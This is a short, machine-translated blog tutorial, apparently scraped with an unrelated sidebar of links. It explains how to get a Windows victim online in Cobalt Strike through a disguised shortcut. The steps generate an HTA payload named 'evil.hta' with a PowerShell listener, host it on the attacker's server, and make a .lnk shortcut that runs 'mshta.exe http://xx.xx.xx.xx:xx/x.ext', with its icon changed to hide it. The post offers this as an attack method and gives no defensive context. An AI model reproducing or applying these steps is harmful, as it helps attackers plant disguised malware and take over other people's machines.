当前位置:网站首页>Use shortcut LNK online CS
Use shortcut LNK online CS
2022-07-06 06:31:00 【zxl2605】
step :
1、 Generate :Attacks -> Packages -> Html Application
2、 Upload :Attacks——>Web Drive by——>Host file
3、 perform :C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
4、 camouflage :
- create shortcut
- Generate HTA And upload
- Property change target execution
- Property change icon
I'll use windows Medium mshta, Used to perform hta file
mshta.exe yes Microsoft Windows operating system Relevant procedures , English full name Microsoft HTML Application, Microsoft Hypertext markup language application , Used to perform .HTA file
Let's demonstrate
Open the configured CS
1、 Generate :Attacks -> Packages -> Html Application
Select the listener to set -power shell
Generate evil.hta
2、 Upload :Attacks——>Web Drive by——>Host file
Copy the generated file URL
3. create shortcut
4. perform :C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext
5. camouflage ( Self expanding , No demonstration )
- create shortcut
- Generate HTA And upload
- Property change target execution
- Property change icon ( Expands itself )
Click shortcut - Shortcut successfully launched
边栏推荐
- Still worrying about how to write web automation test cases? Senior test engineers teach you selenium test case writing hand in hand
- 翻译公司证件盖章的价格是多少
- Testing of web interface elements
- win10无法操作(删除、剪切)文件
- Detailed explanation of P problem, NP problem, NPC problem and NP hard problem
- [Tera term] black cat takes you to learn TTL script -- serial port automation skill in embedded development
- Defense (greed), FBI tree (binary tree)
- Address bar parameter transmission of list page based on jeecg-boot
- MFC 动态创建的对话框及改变控件的大小和位置
- Simulation volume leetcode [general] 1414 The minimum number of Fibonacci numbers with a sum of K
猜你喜欢
Career advancement Guide: recommended books for people in big factories
Biomedical localization translation services
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Redis 核心技术与实战之 基本架构:一个键值数据库包含什么?
Summary of leetcode's dynamic programming 4
Tms320c665x + Xilinx artix7 DSP + FPGA high speed core board
My daily learning records / learning methods
The whole process realizes the single sign on function and the solution of "canceltoken" of undefined when the request is canceled
关于新冠疫情,常用的英文单词、语句有哪些?
英语论文翻译成中文字数变化
随机推荐
Cobalt Strike特征修改
E - 食物链
[Tera term] black cat takes you to learn TTL script -- serial port automation skill in embedded development
oscp raven2靶机渗透过程
Luogu p2141 abacus mental arithmetic test
php使用redis实现分布式锁
Grouping convolution and DW convolution, residuals and inverted residuals, bottleneck and linearbottleneck
如何将flv文件转为mp4文件?一个简单的解决办法
MFC 动态创建的对话框及改变控件的大小和位置
Play video with Tencent video plug-in in uni app
Apple has open source, but what about it?
Redis 核心技术与实战之 基本架构:一个键值数据库包含什么?
私人云盘部署
今日夏至 Today‘s summer solstice
Simulation volume leetcode [general] 1314 Matrix area and
Database isolation level
Distributed system basic (V) protocol (I)
SourceInsight Chinese garbled
Black cat takes you to learn EMMC Protocol Part 10: EMMC read and write operation details (read & write)
MySQL5.72. MSI installation failed